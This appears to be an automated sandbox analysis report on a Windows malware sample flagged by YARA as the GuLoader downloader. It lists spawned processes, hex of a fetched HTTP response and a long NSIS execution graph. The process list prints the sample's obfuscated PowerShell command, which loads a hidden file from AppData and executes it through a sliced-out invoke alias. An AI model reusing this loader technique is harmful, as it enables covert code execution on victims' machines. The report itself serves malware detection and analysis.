                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:09:35 GMT
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-8VAymmCHxvr6rv_SM2eBQg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Content-Length: 1652
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2025-01-11 02:09:35 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 7a 49 42 34 37 36 31 30 70 37 37 7a 75 37 6e 71 6f 58 43 68 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HzIB47610p77zu7nqoXChg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:21:07:27
                                                                    Start date:10/01/2025
                                                                    Path:C:\Users\user\Desktop\ro7eoySJ9q.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\ro7eoySJ9q.exe"
                                                                    Imagebase:0x400000
                                                                    File size:1'060'792 bytes
                                                                    MD5 hash:69C59075BC9FFD11BF75080CFE44F29E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:21:07:32
                                                                    Start date:10/01/2025
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"powershell.exe" -windowstyle minimized "$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aichmophobia.SubString(72360,3);.$Referendumets($Aichmophobia)"
                                                                    Imagebase:0x9c0000
                                                                    File size:433'152 bytes
                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2832325462.000000000A25B000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:3
                                                                    Start time:21:07:32
                                                                    Start date:10/01/2025
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff66e660000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:8
                                                                    Start time:21:08:34
                                                                    Start date:10/01/2025
                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                    Imagebase:0xb40000
                                                                    File size:59'904 bytes
                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000002.3416961233.0000000004BFB000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:22.3%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:21.7%
                                                                      Total number of Nodes:1267
                                                                      Total number of Limit Nodes:30
                                                                      execution_graph 3396 401d41 GetDC GetDeviceCaps 3404 402ab3 3396->3404 3398 401d5f MulDiv ReleaseDC 3399 402ab3 18 API calls 3398->3399 3400 401d7e 3399->3400 3401 405d68 18 API calls 3400->3401 3402 401db7 CreateFontIndirectW 3401->3402 3403 4024e6 3402->3403 3405 405d68 18 API calls 3404->3405 3406 402ac7 3405->3406 3406->3398 3407 401a42 3408 402ab3 18 API calls 3407->3408 3409 401a48 3408->3409 3410 402ab3 18 API calls 3409->3410 3411 4019f0 3410->3411 3412 401cc6 3413 402ab3 18 API calls 3412->3413 3414 401cd9 SetWindowLongW 3413->3414 3415 40295d 3414->3415 3416 401dc7 3417 402ab3 18 API calls 3416->3417 3418 401dcd 3417->3418 3419 402ab3 18 API calls 3418->3419 3420 401dd6 3419->3420 3421 401de8 EnableWindow 3420->3421 3422 401ddd ShowWindow 3420->3422 3423 40295d 3421->3423 3422->3423 3424 401bca 3425 402ab3 18 API calls 3424->3425 3426 401bd1 3425->3426 3427 402ab3 18 API calls 3426->3427 3428 401bdb 3427->3428 3429 401beb 3428->3429 3431 402ad0 18 API calls 3428->3431 3430 401bfb 3429->3430 3432 402ad0 18 API calls 3429->3432 3433 401c06 3430->3433 3434 401c4a 3430->3434 3431->3429 3432->3430 3435 402ab3 18 API calls 3433->3435 3436 402ad0 18 API calls 3434->3436 3437 401c0b 3435->3437 3438 401c4f 3436->3438 3439 402ab3 18 API calls 3437->3439 3440 402ad0 18 API calls 3438->3440 3442 401c14 3439->3442 3441 401c58 FindWindowExW 3440->3441 3445 401c7a 3441->3445 3443 401c3a SendMessageW 3442->3443 3444 401c1c SendMessageTimeoutW 3442->3444 3443->3445 3444->3445 3446 4024ca 3447 402ad0 18 API calls 3446->3447 3448 4024d1 3447->3448 3451 4059cf GetFileAttributesW CreateFileW 3448->3451 3450 4024dd 3451->3450 3452 40194b 3453 402ab3 18 API calls 3452->3453 3454 401952 3453->3454 3455 402ab3 18 API calls 3454->3455 3456 40195c 3455->3456 3457 402ad0 18 API calls 3456->3457 3458 401965 3457->3458 3459 401979 lstrlenW 3458->3459 3461 4019b5 3458->3461 3460 401983 3459->3460 3460->3461 3465 405d46 lstrcpynW 3460->3465 3463 40199e 3463->3461 3464 4019ab lstrlenW 3463->3464 3464->3461 3465->3463 3466 40274b 3467 402ad0 18 API calls 3466->3467 3468 402759 3467->3468 3469 40276f 3468->3469 3470 402ad0 18 API calls 3468->3470 3471 4059aa 2 API calls 3469->3471 3470->3469 3472 402775 3471->3472 3492 4059cf GetFileAttributesW CreateFileW 3472->3492 3474 402782 3475 40282b 3474->3475 3476 40278e GlobalAlloc 3474->3476 3479 402833 DeleteFileW 3475->3479 3480 402846 3475->3480 3477 402822 CloseHandle 3476->3477 3478 4027a7 3476->3478 3477->3475 3493 403192 SetFilePointer 3478->3493 3479->3480 3482 4027ad 3483 403160 ReadFile 3482->3483 3484 4027b6 GlobalAlloc 3483->3484 3485 4027c6 3484->3485 3486 4027fa WriteFile GlobalFree 3484->3486 3487 402f38 33 API calls 3485->3487 3488 402f38 33 API calls 3486->3488 3491 4027d3 3487->3491 3489 40281f 3488->3489 3489->3477 3490 4027f1 GlobalFree 3490->3486 3491->3490 3492->3474 3493->3482 3497 40284c 3498 402ab3 18 API calls 3497->3498 3499 402852 3498->3499 3500 402875 3499->3500 3501 40288e 3499->3501 3507 402729 3499->3507 3502 40287a 3500->3502 3503 40288b 3500->3503 3504 4028a4 3501->3504 3505 402898 3501->3505 3511 405d46 lstrcpynW 3502->3511 3512 405c8d wsprintfW 3503->3512 3506 405d68 18 API calls 3504->3506 3508 402ab3 18 API calls 3505->3508 3506->3507 3508->3507 3511->3507 3512->3507 3513 40164d 3514 402ad0 18 API calls 3513->3514 3515 401653 3514->3515 3516 406089 2 API calls 3515->3516 3517 401659 3516->3517 3518 4019cf 3519 402ad0 18 API calls 3518->3519 3520 4019d6 3519->3520 3521 402ad0 18 API calls 3520->3521 3522 4019df 3521->3522 3523 4019e6 lstrcmpiW 3522->3523 3524 4019f8 lstrcmpW 3522->3524 3525 4019ec 3523->3525 3524->3525 2864 401e51 2865 402ad0 18 API calls 2864->2865 2866 401e57 2865->2866 2867 404ffa 25 API calls 2866->2867 2868 401e61 2867->2868 2882 4054c8 CreateProcessW 2868->2882 2871 401ec6 CloseHandle 2875 402729 2871->2875 2872 401e77 WaitForSingleObject 2873 401e89 2872->2873 2874 401e9b GetExitCodeProcess 2873->2874 2885 4060e9 2873->2885 2876 401eba 2874->2876 2877 401ead 2874->2877 2876->2871 2881 401eb8 2876->2881 2889 405c8d wsprintfW 2877->2889 2881->2871 2883 401e67 2882->2883 2884 4054f7 CloseHandle 2882->2884 2883->2871 2883->2872 2883->2875 2884->2883 2886 406106 PeekMessageW 2885->2886 2887 401e90 WaitForSingleObject 2886->2887 2888 4060fc DispatchMessageW 2886->2888 2887->2873 2888->2886 2889->2881 2890 402251 2891 40225f 2890->2891 2892 402259 2890->2892 2894 40226d 2891->2894 2895 402ad0 18 API calls 2891->2895 2893 402ad0 18 API calls 2892->2893 2893->2891 2896 40227b 2894->2896 2897 402ad0 18 API calls 2894->2897 2895->2894 2898 402ad0 18 API calls 2896->2898 2897->2896 2899 402284 WritePrivateProfileStringW 2898->2899 3526 4028d1 3527 402ab3 18 API calls 3526->3527 3528 4028d7 3527->3528 3529 40290a 3528->3529 3530 402729 3528->3530 3532 4028e5 3528->3532 3529->3530 3531 405d68 18 API calls 3529->3531 3531->3530 3532->3530 3534 405c8d wsprintfW 3532->3534 3534->3530 2900 401752 2901 402ad0 18 API calls 2900->2901 2902 401759 2901->2902 2903 401781 2902->2903 2904 401779 2902->2904 2961 405d46 lstrcpynW 2903->2961 2960 405d46 lstrcpynW 2904->2960 2907 40177f 2911 405fda 5 API calls 2907->2911 2908 40178c 2909 4057ae 3 API calls 2908->2909 2910 401792 lstrcatW 2909->2910 2910->2907 2933 40179e 2911->2933 2912 406089 2 API calls 2912->2933 2913 4059aa 2 API calls 2913->2933 2915 4017b0 CompareFileTime 2915->2933 2916 401870 2918 404ffa 25 API calls 2916->2918 2917 401847 2919 404ffa 25 API calls 2917->2919 2927 40185c 2917->2927 2920 40187a 2918->2920 2919->2927 2939 402f38 2920->2939 2923 4018a1 SetFileTime 2924 4018b3 CloseHandle 2923->2924 2926 4018c4 2924->2926 2924->2927 2925 405d68 18 API calls 2925->2933 2928 4018c9 2926->2928 2929 4018dc 2926->2929 2931 405d68 18 API calls 2928->2931 2932 405d68 18 API calls 2929->2932 2930 405d46 lstrcpynW 2930->2933 2934 4018d1 lstrcatW 2931->2934 2935 4018e4 2932->2935 2933->2912 2933->2913 2933->2915 2933->2916 2933->2917 2933->2925 2933->2930 2938 4059cf GetFileAttributesW CreateFileW 2933->2938 2962 405529 2933->2962 2934->2935 2937 405529 MessageBoxIndirectW 2935->2937 2937->2927 2938->2933 2941 402f53 2939->2941 2940 402f80 2966 403160 ReadFile 2940->2966 2941->2940 2968 403192 SetFilePointer 2941->2968 2945 4030f6 2947 4030fa 2945->2947 2948 403112 2945->2948 2946 402f9d GetTickCount 2952 40188d 2946->2952 2959 402fea 2946->2959 2949 403160 ReadFile 2947->2949 2951 403160 ReadFile 2948->2951 2948->2952 2953 40312d WriteFile 2948->2953 2949->2952 2950 403160 ReadFile 2950->2959 2951->2948 2952->2923 2952->2924 2953->2952 2954 403141 2953->2954 2954->2948 2954->2952 2955 403040 GetTickCount 2955->2959 2956 403065 MulDiv wsprintfW 2957 404ffa 25 API calls 2956->2957 2957->2959 2958 4030a9 WriteFile 2958->2952 2958->2959 2959->2950 2959->2952 2959->2955 2959->2956 2959->2958 2960->2907 2961->2908 2963 40553e 2962->2963 2964 40558a 2963->2964 2965 405552 MessageBoxIndirectW 2963->2965 2964->2933 2965->2964 2967 402f8b 2966->2967 2967->2945 2967->2946 2967->2952 2968->2940 3535 402452 3536 402bda 19 API calls 3535->3536 3537 40245c 3536->3537 3538 402ab3 18 API calls 3537->3538 3539 402465 3538->3539 3540 402489 RegEnumValueW 3539->3540 3541 40247d RegEnumKeyW 3539->3541 3543 402729 3539->3543 3542 4024a2 RegCloseKey 3540->3542 3540->3543 3541->3542 3542->3543 3545 4022d3 3546 402303 3545->3546 3547 4022d8 3545->3547 3549 402ad0 18 API calls 3546->3549 3548 402bda 19 API calls 3547->3548 3550 4022df 3548->3550 3551 40230a 3549->3551 3552 402ad0 18 API calls 3550->3552 3555 402320 3550->3555 3556 402b10 RegOpenKeyExW 3551->3556 3554 4022f0 RegDeleteValueW RegCloseKey 3552->3554 3554->3555 3559 402b3b 3556->3559 3564 402b87 3556->3564 3557 402b61 RegEnumKeyW 3558 402b73 RegCloseKey 3557->3558 3557->3559 3561 4060b0 3 API calls 3558->3561 3559->3557 3559->3558 3560 402b98 RegCloseKey 3559->3560 3562 402b10 3 API calls 3559->3562 3560->3564 3563 402b83 3561->3563 3562->3559 3563->3564 3565 402bb3 RegDeleteKeyW 3563->3565 3564->3555 3565->3564 3566 401ed4 3567 402ad0 18 API calls 3566->3567 3568 401edb 3567->3568 3569 406089 2 API calls 3568->3569 3570 401ee1 3569->3570 3571 401ef2 3570->3571 3573 405c8d wsprintfW 3570->3573 3573->3571 3574 4014d7 3575 402ab3 18 API calls 3574->3575 3576 4014dd Sleep 3575->3576 3578 40295d 3576->3578 3579 4036d8 3580 4036e3 3579->3580 3581 4036e7 3580->3581 3582 4036ea GlobalAlloc 3580->3582 3582->3581 3583 40155b 3584 402903 3583->3584 3587 405c8d wsprintfW 3584->3587 3586 402908 3587->3586 3588 4026dc 3589 4026db 3588->3589 3589->3588 3590 4026ec FindNextFileW 3589->3590 3592 4026f7 3589->3592 3591 40273e 3590->3591 3590->3592 3594 405d46 lstrcpynW 3591->3594 3594->3592 3085 4031dd #17 SetErrorMode OleInitialize 3086 4060b0 3 API calls 3085->3086 3087 403220 SHGetFileInfoW 3086->3087 3158 405d46 lstrcpynW 3087->3158 3089 40324b GetCommandLineW 3159 405d46 lstrcpynW 3089->3159 3091 40325d GetModuleHandleW 3092 403275 3091->3092 3093 4057db CharNextW 3092->3093 3094 403284 CharNextW 3093->3094 3105 403294 3094->3105 3095 403364 3096 403378 GetTempPathW 3095->3096 3160 4031a9 3096->3160 3098 403390 3100 403394 GetWindowsDirectoryW lstrcatW 3098->3100 3101 4033ea DeleteFileW 3098->3101 3099 4057db CharNextW 3099->3105 3103 4031a9 11 API calls 3100->3103 3168 402cff GetTickCount GetModuleFileNameW 3101->3168 3106 4033b0 3103->3106 3104 4033fe 3107 403496 3104->3107 3110 403486 3104->3110 3114 4057db CharNextW 3104->3114 3105->3095 3105->3099 3109 403366 3105->3109 3106->3101 3108 4033b4 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3106->3108 3253 403640 3107->3253 3113 4031a9 11 API calls 3108->3113 3250 405d46 lstrcpynW 3109->3250 3196 40371a 3110->3196 3117 4033e2 3113->3117 3118 403419 3114->3118 3117->3101 3117->3107 3125 403460 3118->3125 3126 4034c5 lstrcatW lstrcmpiW 3118->3126 3119 4035a5 3121 403628 ExitProcess 3119->3121 3123 4060b0 3 API calls 3119->3123 3120 4034af 3122 405529 MessageBoxIndirectW 3120->3122 3127 4034bd ExitProcess 3122->3127 3128 4035b4 3123->3128 3129 4058b6 18 API calls 3125->3129 3126->3107 3130 4034e1 CreateDirectoryW SetCurrentDirectoryW 3126->3130 3131 4060b0 3 API calls 3128->3131 3132 40346c 3129->3132 3133 403504 3130->3133 3134 4034f9 3130->3134 3137 4035bd 3131->3137 3132->3107 3251 405d46 lstrcpynW 3132->3251 3261 405d46 lstrcpynW 3133->3261 3260 405d46 lstrcpynW 3134->3260 3139 4060b0 3 API calls 3137->3139 3141 4035c6 3139->3141 3140 40347b 3252 405d46 lstrcpynW 3140->3252 3144 403614 ExitWindowsEx 3141->3144 3149 4035d4 GetCurrentProcess 3141->3149 3143 405d68 18 API calls 3145 403543 DeleteFileW 3143->3145 3144->3121 3146 403621 3144->3146 3147 403550 CopyFileW 3145->3147 3155 403512 3145->3155 3262 40140b 3146->3262 3147->3155 3151 4035e4 3149->3151 3150 403599 3152 405be0 40 API calls 3150->3152 3151->3144 3152->3107 3153 405be0 40 API calls 3153->3155 3154 405d68 18 API calls 3154->3155 3155->3143 3155->3150 3155->3153 3155->3154 3156 4054c8 2 API calls 3155->3156 3157 403584 CloseHandle 3155->3157 3156->3155 3157->3155 3158->3089 3159->3091 3161 405fda 5 API calls 3160->3161 3162 4031b5 3161->3162 3163 4031bf 3162->3163 3164 4057ae 3 API calls 3162->3164 3163->3098 3165 4031c7 CreateDirectoryW 3164->3165 3265 4059fe 3165->3265 3269 4059cf GetFileAttributesW CreateFileW 3168->3269 3170 402d3f 3189 402d4f 3170->3189 3270 405d46 lstrcpynW 3170->3270 3172 402d65 3173 4057fa 2 API calls 3172->3173 3174 402d6b 3173->3174 3271 405d46 lstrcpynW 3174->3271 3176 402d76 GetFileSize 3177 402e72 3176->3177 3195 402d8d 3176->3195 3272 402c9b 3177->3272 3179 402e7b 3181 402eab GlobalAlloc 3179->3181 3179->3189 3283 403192 SetFilePointer 3179->3283 3180 403160 ReadFile 3180->3195 3284 403192 SetFilePointer 3181->3284 3183 402ede 3186 402c9b 6 API calls 3183->3186 3185 402ec6 3188 402f38 33 API calls 3185->3188 3186->3189 3187 402e94 3190 403160 ReadFile 3187->3190 3193 402ed2 3188->3193 3189->3104 3191 402e9f 3190->3191 3191->3181 3191->3189 3192 402c9b 6 API calls 3192->3195 3193->3189 3193->3193 3194 402f0f SetFilePointer 3193->3194 3194->3189 3195->3177 3195->3180 3195->3183 3195->3189 3195->3192 3197 4060b0 3 API calls 3196->3197 3198 40372e 3197->3198 3199 403734 3198->3199 3200 403746 3198->3200 3294 405c8d wsprintfW 3199->3294 3201 405c13 3 API calls 3200->3201 3202 403776 3201->3202 3204 403795 lstrcatW 3202->3204 3206 405c13 3 API calls 3202->3206 3205 403744 3204->3205 3285 4039f0 3205->3285 3206->3204 3209 4058b6 18 API calls 3210 4037c7 3209->3210 3211 40385b 3210->3211 3213 405c13 3 API calls 3210->3213 3212 4058b6 18 API calls 3211->3212 3214 403861 3212->3214 3215 4037f9 3213->3215 3216 403871 LoadImageW 3214->3216 3217 405d68 18 API calls 3214->3217 3215->3211 3221 40381a lstrlenW 3215->3221 3224 4057db CharNextW 3215->3224 3218 403917 3216->3218 3219 403898 RegisterClassW 3216->3219 3217->3216 3220 40140b 2 API calls 3218->3220 3222 4038ce SystemParametersInfoW CreateWindowExW 3219->3222 3249 403921 3219->3249 3223 40391d 3220->3223 3225 403828 lstrcmpiW 3221->3225 3226 40384e 3221->3226 3222->3218 3231 4039f0 19 API calls 3223->3231 3223->3249 3229 403817 3224->3229 3225->3226 3227 403838 GetFileAttributesW 3225->3227 3228 4057ae 3 API calls 3226->3228 3230 403844 3227->3230 3232 403854 3228->3232 3229->3221 3230->3226 3233 4057fa 2 API calls 3230->3233 3234 40392e 3231->3234 3295 405d46 lstrcpynW 3232->3295 3233->3226 3236 40393a ShowWindow LoadLibraryW 3234->3236 3237 4039bd 3234->3237 3239 403960 GetClassInfoW 3236->3239 3240 403959 LoadLibraryW 3236->3240 3238 4050cd 5 API calls 3237->3238 3241 4039c3 3238->3241 3242 403974 GetClassInfoW RegisterClassW 3239->3242 3243 40398a DialogBoxParamW 3239->3243 3240->3239 3244 4039c7 3241->3244 3245 4039df 3241->3245 3242->3243 3246 40140b 2 API calls 3243->3246 3248 40140b 2 API calls 3244->3248 3244->3249 3247 40140b 2 API calls 3245->3247 3246->3249 3247->3249 3248->3249 3249->3107 3250->3096 3251->3140 3252->3110 3254 403658 3253->3254 3255 40364a CloseHandle 3253->3255 3297 403685 3254->3297 3255->3254 3258 4055d5 71 API calls 3259 40349f OleUninitialize 3258->3259 3259->3119 3259->3120 3260->3133 3261->3155 3263 401389 2 API calls 3262->3263 3264 401420 3263->3264 3264->3121 3266 405a0b GetTickCount GetTempFileNameW 3265->3266 3267 405a41 3266->3267 3268 4031db 3266->3268 3267->3266 3267->3268 3268->3098 3269->3170 3270->3172 3271->3176 3273 402ca4 3272->3273 3274 402cbc 3272->3274 3275 402cb4 3273->3275 3276 402cad DestroyWindow 3273->3276 3277 402cc4 3274->3277 3278 402ccc GetTickCount 3274->3278 3275->3179 3276->3275 3279 4060e9 2 API calls 3277->3279 3280 402cda CreateDialogParamW ShowWindow 3278->3280 3281 402cfd 3278->3281 3282 402cca 3279->3282 3280->3281 3281->3179 3282->3179 3283->3187 3284->3185 3286 403a04 3285->3286 3296 405c8d wsprintfW 3286->3296 3288 403a75 3289 405d68 18 API calls 3288->3289 3290 403a81 SetWindowTextW 3289->3290 3291 4037a5 3290->3291 3292 403a9d 3290->3292 3291->3209 3292->3291 3293 405d68 18 API calls 3292->3293 3293->3292 3294->3205 3295->3211 3296->3288 3298 403693 3297->3298 3299 40365d 3298->3299 3300 403698 FreeLibrary GlobalFree 3298->3300 3299->3258 3300->3299 3300->3300 3374 4023de 3385 402bda 3374->3385 3376 4023e8 3377 402ad0 18 API calls 3376->3377 3378 4023f1 3377->3378 3379 402729 3378->3379 3380 4023fc RegQueryValueExW 3378->3380 3381 40241c 3380->3381 3384 402422 RegCloseKey 3380->3384 3381->3384 3389 405c8d wsprintfW 3381->3389 3384->3379 3386 402ad0 18 API calls 3385->3386 3387 402bf3 3386->3387 3388 402c01 RegOpenKeyExW 3387->3388 3388->3376 3389->3384 3595 40165e 3596 402ad0 18 API calls 3595->3596 3597 401665 3596->3597 3598 402ad0 18 API calls 3597->3598 3599 40166e 3598->3599 3600 402ad0 18 API calls 3599->3600 3601 401677 MoveFileW 3600->3601 3602 401683 3601->3602 3603 40168a 3601->3603 3605 401423 25 API calls 3602->3605 3604 406089 2 API calls 3603->3604 3607 402195 3603->3607 3606 401699 3604->3606 3605->3607 3606->3607 3608 405be0 40 API calls 3606->3608 3608->3602 3609 4040e3 lstrlenW 3610 404102 3609->3610 3611 404104 WideCharToMultiByte 3609->3611 3610->3611 3612 401ce5 GetDlgItem GetClientRect 3613 402ad0 18 API calls 3612->3613 3614 401d17 LoadImageW SendMessageW 3613->3614 3615 401d35 DeleteObject 3614->3615 3616 40295d 3614->3616 3615->3616 3617 4043e9 3618 4043f9 3617->3618 3619 40441f 3617->3619 3621 403f95 19 API calls 3618->3621 3620 403ffc 8 API calls 3619->3620 3622 40442b 3620->3622 3623 404406 SetDlgItemTextW 3621->3623 3623->3619 3624 40206a 3625 402ad0 18 API calls 3624->3625 3626 402071 3625->3626 3627 402ad0 18 API calls 3626->3627 3628 40207b 3627->3628 3629 402ad0 18 API calls 3628->3629 3630 402084 3629->3630 3631 402ad0 18 API calls 3630->3631 3632 40208e 3631->3632 3633 402ad0 18 API calls 3632->3633 3634 402098 3633->3634 3635 4020ac CoCreateInstance 3634->3635 3636 402ad0 18 API calls 3634->3636 3639 4020cb 3635->3639 3636->3635 3637 401423 25 API calls 3638 402195 3637->3638 3639->3637 3639->3638 3640 40156b 3641 401584 3640->3641 3642 40157b ShowWindow 3640->3642 3643 401592 ShowWindow 3641->3643 3644 40295d 3641->3644 3642->3641 3643->3644 3645 4024ec 3646 4024f1 3645->3646 3647 40250a 3645->3647 3648 402ab3 18 API calls 3646->3648 3649 402510 3647->3649 3650 40253c 3647->3650 3651 4024f8 3648->3651 3652 402ad0 18 API calls 3649->3652 3653 402ad0 18 API calls 3650->3653 3656 402565 WriteFile 3651->3656 3657 402729 3651->3657 3654 402517 WideCharToMultiByte lstrlenA 3652->3654 3655 402543 lstrlenW 3653->3655 3654->3651 3655->3651 3656->3657 3658 404f6e 3659 404f92 3658->3659 3660 404f7e 3658->3660 3663 404f9a IsWindowVisible 3659->3663 3669 404fb1 3659->3669 3661 404f84 3660->3661 3662 404fdb 3660->3662 3665 403fe1 SendMessageW 3661->3665 3664 404fe0 CallWindowProcW 3662->3664 3663->3662 3666 404fa7 3663->3666 3667 404f8e 3664->3667 3665->3667 3671 4048c4 SendMessageW 3666->3671 3669->3664 3676 404944 3669->3676 3672 404923 SendMessageW 3671->3672 3673 4048e7 GetMessagePos ScreenToClient SendMessageW 3671->3673 3675 40491b 3672->3675 3674 404920 3673->3674 3673->3675 3674->3672 3675->3669 3685 405d46 lstrcpynW 3676->3685 3678 404957 3686 405c8d wsprintfW 3678->3686 3680 404961 3681 40140b 2 API calls 3680->3681 3682 40496a 3681->3682 3687 405d46 lstrcpynW 3682->3687 3684 404971 3684->3662 3685->3678 3686->3680 3687->3684 3688 4018ef 3689 401926 3688->3689 3690 402ad0 18 API calls 3689->3690 3691 40192b 3690->3691 3692 4055d5 71 API calls 3691->3692 3693 401934 3692->3693 3694 402571 3695 402ab3 18 API calls 3694->3695 3699 40257a 3695->3699 3696 4025c1 ReadFile 3696->3699 3704 402642 3696->3704 3697 4025fe ReadFile 3697->3699 3697->3704 3698 4025de MultiByteToWideChar 3698->3699 3699->3696 3699->3697 3699->3698 3700 402644 3699->3700 3701 402655 3699->3701 3699->3704 3705 405c8d wsprintfW 3700->3705 3703 402671 SetFilePointer 3701->3703 3701->3704 3703->3704 3705->3704 3706 4014f1 SetForegroundWindow 3707 40295d 3706->3707 3708 4018f2 3709 402ad0 18 API calls 3708->3709 3710 4018f9 3709->3710 3711 405529 MessageBoxIndirectW 3710->3711 3712 401902 3711->3712 3713 401df3 3714 402ad0 18 API calls 3713->3714 3715 401df9 3714->3715 3716 402ad0 18 API calls 3715->3716 3717 401e02 3716->3717 3718 402ad0 18 API calls 3717->3718 3719 401e0b 3718->3719 3720 402ad0 18 API calls 3719->3720 3721 401e14 3720->3721 3722 401423 25 API calls 3721->3722 3723 401e1b ShellExecuteW 3722->3723 3724 401e4c 3723->3724 3730 404976 GetDlgItem GetDlgItem 3731 4049c8 7 API calls 3730->3731 3740 404be1 3730->3740 3732 404a6b DeleteObject 3731->3732 3733 404a5e SendMessageW 3731->3733 3734 404a74 3732->3734 3733->3732 3735 404aab 3734->3735 3739 405d68 18 API calls 3734->3739 3737 403f95 19 API calls 3735->3737 3736 404cc5 3738 404d71 3736->3738 3748 404d1e SendMessageW 3736->3748 3769 404bd4 3736->3769 3741 404abf 3737->3741 3742 404d83 3738->3742 3743 404d7b SendMessageW 3738->3743 3744 404a8d SendMessageW SendMessageW 3739->3744 3740->3736 3746 4048c4 5 API calls 3740->3746 3773 404c52 3740->3773 3747 403f95 19 API calls 3741->3747 3745 404dac 3742->3745 3751 404d95 ImageList_Destroy 3742->3751 3752 404d9c 3742->3752 3743->3742 3744->3734 3754 404f1b 3745->3754 3772 404944 4 API calls 3745->3772 3777 404de7 3745->3777 3746->3773 3753 404acd 3747->3753 3755 404d33 SendMessageW 3748->3755 3748->3769 3749 403ffc 8 API calls 3756 404f67 3749->3756 3750 404cb7 SendMessageW 3750->3736 3751->3752 3752->3745 3757 404da5 GlobalFree 3752->3757 3758 404ba2 GetWindowLongW SetWindowLongW 3753->3758 3766 404b1d SendMessageW 3753->3766 3768 404b9c 3753->3768 3770 404b59 SendMessageW 3753->3770 3771 404b6a SendMessageW 3753->3771 3759 404f2d ShowWindow GetDlgItem ShowWindow 3754->3759 